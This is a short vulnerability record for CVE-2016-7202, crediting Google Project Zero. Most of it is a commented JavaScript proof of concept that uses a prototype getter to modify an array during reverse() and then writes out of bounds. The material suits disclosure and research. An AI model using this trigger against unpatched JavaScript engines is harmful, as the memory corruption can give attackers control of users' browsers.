CVE-2016-7202

  • Report: Sep 2016
  • Fix: Nov 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

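// One real element at index 0; indices 1..999 are holes.
var a = [1];
a.length = 1000;
// Used only to borrow Array.prototype methods (fill, reverse).
var j = [];

var o = {};
Object.defineProperty(o, '1', {
  get: function() {
    // Runs when a lookup of the missing a[1] falls through to the prototype.
    // It grows the array and overwrites every element while the caller is
    // still in the middle of its own operation on a.
    a.length = 1002;
    j.fill.call(a, 7.7);
    return 2;
  }
});

a.__proto__ = o;

// reverse() looks up missing elements through the prototype chain,
// so the getter above fires while the reverse is in progress.
var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;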

Reference